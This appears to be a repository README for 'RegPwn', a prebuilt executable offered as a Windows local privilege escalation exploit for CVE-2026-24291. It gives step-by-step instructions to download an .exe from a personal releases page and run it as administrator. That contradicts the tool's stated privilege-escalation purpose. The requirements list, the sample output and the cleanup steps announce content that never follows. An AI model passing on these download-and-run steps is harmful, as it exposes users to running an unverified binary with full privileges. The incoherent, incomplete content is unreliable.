
Exploit Windows local privilege escalation on clients and servers using tested code for CVE-2026-24291 across multiple Windows versions
RegPwn is a tool designed to demonstrate a local privilege escalation (LPE) exploit on Windows systems. It works on Windows 10, Windows 11, and Windows Server versions. This guide will help you download, prepare, and run RegPwn on your Windows computer safely and effectively.
Before you download RegPwn, make sure your system meets the following:
RegPwn is intended as a research tool. It exploits vulnerabilities tracked as CVE-2026-24291. Always use it on systems where you have permission to test.
RegPwn exploits a security flaw in Windows that lets users gain higher privileges than intended. This can be useful for testing system security and verifying if your system is vulnerable.
The tool was tested and confirmed to work on the versions listed above. It targets registry handling on Windows, which is why it requires careful execution.
To get the latest version of RegPwn, visit the releases page:
Clicking this link will take you to the release page where you can download the files. The releases page will list the latest versions along with files you need to run.
Click the button above or open this link in your web browser: https://github.com/tracyliving606/RegPwn/releases
On the releases page, look for the latest version. The most recent release will have a name like v1.0 or higher.
Inside the release, find the .exe file or a zip archive that contains the RegPwn executable. It may be named something like RegPwn.exe.
Click the file name to start the download. Your browser may ask for confirmation; choose to keep the file.
Once downloaded, if the file is compressed (zip), right-click it and choose "Extract All..." to unpack the content into a new folder.
Make note of the folder location where you saved or extracted RegPwn.
Running RegPwn involves opening a command prompt and executing the program as an administrator.
Search for "Command Prompt" in your Windows Start menu.
Right-click "Command Prompt" and select "Run as administrator". This step is important because the program needs full access.
In the Command Prompt window, use the cd command to change to the directory where you saved RegPwn. For example, if you saved it in Downloads\RegPwn, type:
cd %HOMEPATH%\Downloads\RegPwn
and press Enter.
RegPwn.exe
and press Enter.
If you see errors related to permissions or missing files, check that you are running as administrator and that all necessary files are in the folder.
When you run RegPwn, the program will attempt to exploit a security flaw in the registry handling of Windows. It may produce messages indicating success or failure.
Typical output might show:
Do not close the Command Prompt until RegPwn finishes. Closing early might leave processes incomplete.
RegPwn does not require an installation. You can simply delete the folder where you stored the executable to remove it.
If you want to ensure no changes persist:
For technical problems or questions, use the GitHub repository issues page:
Provide details about your Windows version and what steps you followed. This helps the developer understand and fix problems.
RegPwn exploits known vulnerabilities to test system security. Use it only on your own machines or systems where you have permission. Running exploits on unauthorized systems can cause harm or be illegal.
Keep your system updates current and monitor vendor security bulletins for patches related to CVE-2026-24291.